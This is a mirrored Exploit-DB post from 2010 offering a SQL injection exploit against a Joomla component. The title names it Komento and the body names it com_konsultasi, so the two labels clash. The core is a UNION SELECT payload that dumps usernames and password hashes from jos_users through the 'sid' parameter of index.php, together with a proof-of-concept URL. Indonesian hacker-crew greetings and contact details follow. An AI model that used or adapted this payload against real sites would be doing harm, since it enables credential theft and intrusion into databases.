Joomla! Component Komento 1.0.0 – ‘sid’ SQL Injection

  • 作者: c4uR
    日期: 2010-05-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12590/
  • -------------------------------------------------------------------------
    Joomla Component com_konsultasi (sid) SQL Injection Vulnerability
    -------------------------------------------------------------------------
    Author: c4uR
    Date: May, 13, 2010
    Location: Jakarta, Indonesia
    Time Zone : GMT +7:00
    -------------------------------------------------------------------------
    
    Esploit :
    ----------
    
    -5/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--
    
    SQLi p0c :
    -----------
    
    http://127.0.0.1/[gubrak]/index.php?option=com_konsultasi&act=detail&sid=[gubrak]
    -------------------------------------------------------------------------
    
    crott :
    -----------
    
    [+] Malingsial sempak, crott... crott... crott...
    [+] tian(tangannye jgn nakal)+GheMaX(byk² makan, biar ad isinye)+xx_user+ChuCu+JaLi-
    [+] si m0n0n, banci kamera(1214n,v4lc0m87,astroboyyy,aldy182)
    [+] bocah tua nakal (mbah l4mpor,awchoy)
    [+] flyff666(hacker qo, rokoknye djarum super cich. brukakakakaka)
    [+] cruz3N(jgn maen sabun molo coy)+petimati(roko sp ajah d comot,brukakakak)
    [+] spykit-hendri note(kalian jgn marahan mulu ea, yg akur..)
    [+] v3n0m(payah ach, masa cari kost ajah blom ktmu sich, brukakakakaak)
    [+] koh wisdom(rokok trus)+blue screen,skutengboy(kalian pasangan yg serasi, jikakakakakk)
    [+] uzanc(payah ah, masa gw gg dibikinin)+jhony ramsoy(klo nikah, undang² gw ea)
    [+] kiddies+om whitehat+chaer+om xadpritox
    [+] K9+atom+legion(Good Job+you best cracker... hashkiller)
    [+] amel bauell, gg ad matinye...
    
    
    
    [+] Apartement Griya Semanggi + poinsonV
    [+] Indonesia gg ada matinye, walaupun terkadang suram
    -------------------------------------------------------------------------
    
    contact :
    -----------
    
    - qinoryy@yahoo.com
    - #devilzc0de @irc.dal.net